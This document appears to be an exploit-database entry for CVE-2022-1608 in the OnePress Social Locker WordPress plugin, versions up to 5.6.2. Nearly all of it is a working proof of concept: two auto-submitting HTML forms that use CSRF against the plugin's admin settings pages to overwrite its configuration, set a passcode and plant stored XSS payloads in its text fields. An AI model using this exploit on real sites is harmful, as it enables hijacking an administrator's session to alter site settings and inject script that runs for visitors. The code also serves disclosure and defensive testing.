Exploit for OnePress Social Locker <= 5.6.2 - Arbitrary Settings Update via CSRF CVE-2022-1608

## https://sploitus.com/exploit?id=WPEX-ID:56D2D55B-BD09-47AF-988C-7F47EEC4151F
<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=terms" method="POST">
    <input type="text" name="terms_enabled_is_active" value="1">
    <input type="text" name="opanda_terms_enabled" value="1">
    <input type="text" name="privacy_enabled_is_active" value="1">
    <input type="text" name="opanda_privacy_enabled" value="1">
    <input type="text" name="terms_use_pages_is_active" value="1">
    <input type="text" name="terms_of_use_text_is_active" value="1">
    <textarea name="opanda_terms_of_use_text"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="privacy_policy_text_is_active" value="1">
    <textarea name="opanda_privacy_policy_text"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="terms_of_use_page_is_active" value="1">
    <input type="text" name="opanda_terms_of_use_page" value="80">
    <input type="text" name="privacy_policy_page_is_active" value="1">
    <input type="text" name="opanda_privacy_policy_page" value="80">
    <input type="text" name="save-action" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=lock" method="POST">
    <input type="text" name="debug_is_active" value="1">
    <input type="text" name="passcode_is_active" value="1">
    <input type="text" name="opanda_passcode" value="1234">
    <input type="text" name="permanent_passcode_is_active" value="1">
    <input type="text" name="interrelation_is_active" value="1">
    <input type="text" name="in_app_browsers_is_active" value="1">
    <input type="text" name="opanda_in_app_browsers" value="visible_with_warning">
    <input type="text" name="in_app_browsers_warning_is_active" value="1">
    <input type="text" name="opanda_in_app_browsers_warning" value="You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.">
    <input type="text" name="adblock_is_active" value="1">
    <input type="text" name="opanda_adblock" value="show_error">
    <input type="text" name="adblock_error_is_active" value="1">
    <textarea name="opanda_adblock_error"><img src=x onerror=alert(1)></textarea>
    <input type="text" name="rss_is_active" value="1">
    <input type="text" name="actual_urls_is_active" value="1">
    <input type="text" name="session_duration_is_active" value="1">
    <input type="text" name="opanda_session_duration" value="900">
    <input type="text" name="session_freezing_is_active" value="1">
    <input type="text" name="normalize_markup_is_active" value="1">
    <input type="text" name="dynamic_theme_is_active" value="1">
    <input type="text" name="managed_hook_is_active" value="1">
    <input type="text" name="opanda_managed_hook" value="">
    <input type="text" name="alt_overlap_mode_is_active" value="1">
    <input type="text" name="opanda_alt_overlap_mode" value="transparence">
    <input type="text" name="content_visibility_is_active" value="1">
    <input type="text" name="opanda_content_visibility" value="auto">
    <input type="text" name="tumbler_is_active" value="1">
    <input type="text" name="timeout_is_active" value="1">
    <input type="text" name="opanda_timeout" value="20000">
    <input type="text" name="save-action" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>